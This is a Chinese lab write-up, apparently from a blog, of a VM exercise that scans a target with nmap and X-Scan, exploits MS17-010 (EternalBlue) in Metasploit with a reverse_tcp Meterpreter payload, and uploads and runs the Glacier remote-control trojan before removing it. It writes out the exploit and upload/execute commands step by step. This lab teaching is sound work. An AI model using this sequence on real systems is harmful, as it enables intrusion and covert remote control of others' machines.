nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河

2023-11-08

一、实验目的

利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河控制靶机,最后用冰河陷阱清除靶机的冰河,记一次完整的入侵控制实验。

二、实验环境

工具软件:VMware、nmap、X-Scan 3.3、Metasploit、冰河、冰河陷阱

实验准备:虚拟机Kali Linux 2022.2、虚拟机Windows server 2008 r2、虚拟机Windows XP

注意:本实验中,Kali为攻击机,XP和08r2为靶机

三、实验内容(实验步骤、测试数据等)

查看08r2的ip地址,192.168.63.131,并用ping测试其与Kali的网络连通性,如下图:

查看Kali的ip地址,192.168.63.132,并用ping测试其与08r2的网络连通性,如下图:

第一部分,利用nmap进行扫描

本部分在攻击机Kali中进行,目的为扫描出靶机可能存在的漏洞,为攻击找到突破口

(1)使用nmap扫描目标网络,只进行主机发现,不扫描端口

在攻击机Kali终端中使用nmap工具

命令:nmap -sP 192.168.63.0/24(扫描该网段存活的主机)

可以看到该网段有4台主机存活,其中.131和.132是08r2和Kali本身,如下图:

(2)使用nmap扫描目标操作系统信息、服务版本信息

命令:nmap -nmap -O 192.168.63.131(扫描靶机08r2的操作系统信息、服务版本信息)

或者命令:namp -O 192.168.63.131(正常来说应该是这个命令,2022.2版本的Kali好像不行;此实验较久远,细节不好再探究) 如下图:

(3)使用nmap脚本扫描,找出目标主机ms08-067,ms17-010漏洞

命令:nmap --script=Vuln 192.168.63.131(192.168.63.131为08r2的ip地址,即靶机的ip地址) 如下图:

扫描发现ms17-010漏洞,无ms08-067漏洞

第二部分,利用X-Scan扫描

本部分在靶机08r2中进行,目的为扫描出自身可能存在的漏洞

执行X-Scan,选择菜单栏设置下的菜单项“扫描模块”,确定要扫描主机的IP地址或者IP地址段,选择菜单栏设置下的菜单项“扫描参数”,扫描一共服务器主机,在指定IP范围框中输入IP地址。并勾选部分扫描参数,设置完毕后,进行漏洞扫描,点击工具栏上的绿色图标“开始”,开始对目标主机进行扫描

靶机08r2的ip地址:192.168.63.131

因为是扫描自身,所以指定IP范围直接指定自身的ip地址即可,当然想要扫描同一网段中其他主机的情况可以在地址簿中添加或者修改范围

设置扫描范围操作截图如下:

字典设置截图如下:

扫描过程截图如下:

扫描结束后,X-Scan会生成一个扫描报告

在报告中具体情况具体分析

X-Scan工具比较古老,适合初学者进行实验。实际已经是比较落后的工具,在不同的环境中扫描结果或许会有出入

第三部分,开始入侵

(1)利用smb协议漏洞exploit ms17_010对靶机进行攻击

命令:msfconsole(在Kali中打开渗透测试工具Metasploit),如下图:

命令:search ms17-010

发现4个攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue(或者“use 序号”,即“use 0”)

选择第0个攻击模块

上述操作如下图:

命令:show options

查看RHOSTS(目标主机ip,靶机ip)和LHOST(自身ip,自身ip)的设置情况,如下图:

命令:show payloads

查看载荷,如下图:

命令:set payload payload/windows/x64/meterpreter/reverse_tcp

选择上图序号为16的载荷,不同版本Kali序号不同

命令:set RHOST 192.168.63.131

设置目标主机/靶机ip地址,即08r2的ip地址192.168.63.131

命令:set LHOST 192.168.63.132

设置本地主机/攻击机ip地址,即Kali自身的ip地址192.168.63.132

命令:exploit

执行

上述操作如下图:

成功,meterpreter 会话1已打开

第四部分,冰河远程控制

(1)msf建立连接后,利用Meterpreter 命令上传木马到靶机

命令:ps

成功入侵后,查看08r2的系统进程,如下图:

命令:screenshot

拍摄08r2的屏幕截图

命令:run vnc

进行对08r2的屏幕实时监控

上述操作如下图:

(2)让冰河在靶机中运行

命令:upload /home/kali/Desktop/G_Server.exe C:/

upload 木马存储路径 目标主机存储路径

利用upload把冰河从本地上传到08r2中,这里选择的是上传到08r2的桌面,即C:/

命令:execute -f C:/G_Server.exe

利用execute命令使冰河在目标主机运行

该命令使冰河G_Server.exe在08r2中运行,打开cmd输入netstat -an,发现7626端口没有被打开(冰河感染的典型特征,正常情况被感染后7626端口会被打开),不过依然有其他特征,第一,08r2进程列表中名为kernel32.exe的进程正在运行,kernel32.exe是冰河感染后运行在C:\Windows\system32的木马进程,如下图:

第二,尝试运行冰河陷阱发现弹出提示本机被感染,如下图:

本次实验未改动过冰河的默认感染端口,且靶机防火墙也是关闭状态,所以7626端口没有被打开有点奇怪,有可能是08r2的版本问题,由于实验久远,细节不再细究

为了更好地模拟普遍情况,观察7626端口是否会被打开,本实验后续靶机更换为Windows XP,继“已入侵的情况下”进行实验

在XP桌面双击运行G_Server.exe,使本机感染冰河,双击运行后系统无反应,在终端中查看7626端口是否被打开(7626端口被打开是被冰河感染的征兆)

命令:netstat -an

查看当前端口状态,已被冰河感染的系统会被默认打开7626端口,如下图:

XP的ip地址为192.168.63.139

在攻击机运行G_Client.exe(冰河的客户端),在起始域输入靶机网段,搜索到靶机ip:192.168.63.139

成功连接,可以尝试各种远程操作。

冰河远程控制界面如下:

(3)靶机使用冰河陷阱清除冰河并设置蜜罐捕获控制机

四、实验体会

本实验使用nmap和X-Scan扫描出永恒之蓝漏洞,在Metasploit中使用永恒之蓝漏洞入侵靶机,建立连接后用冰河感染靶机,最后用冰河陷阱清除冰河。算是一次排除万难、流程清晰的实操,收获不小,供初学者有参考意义。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河 的相关文章

随机推荐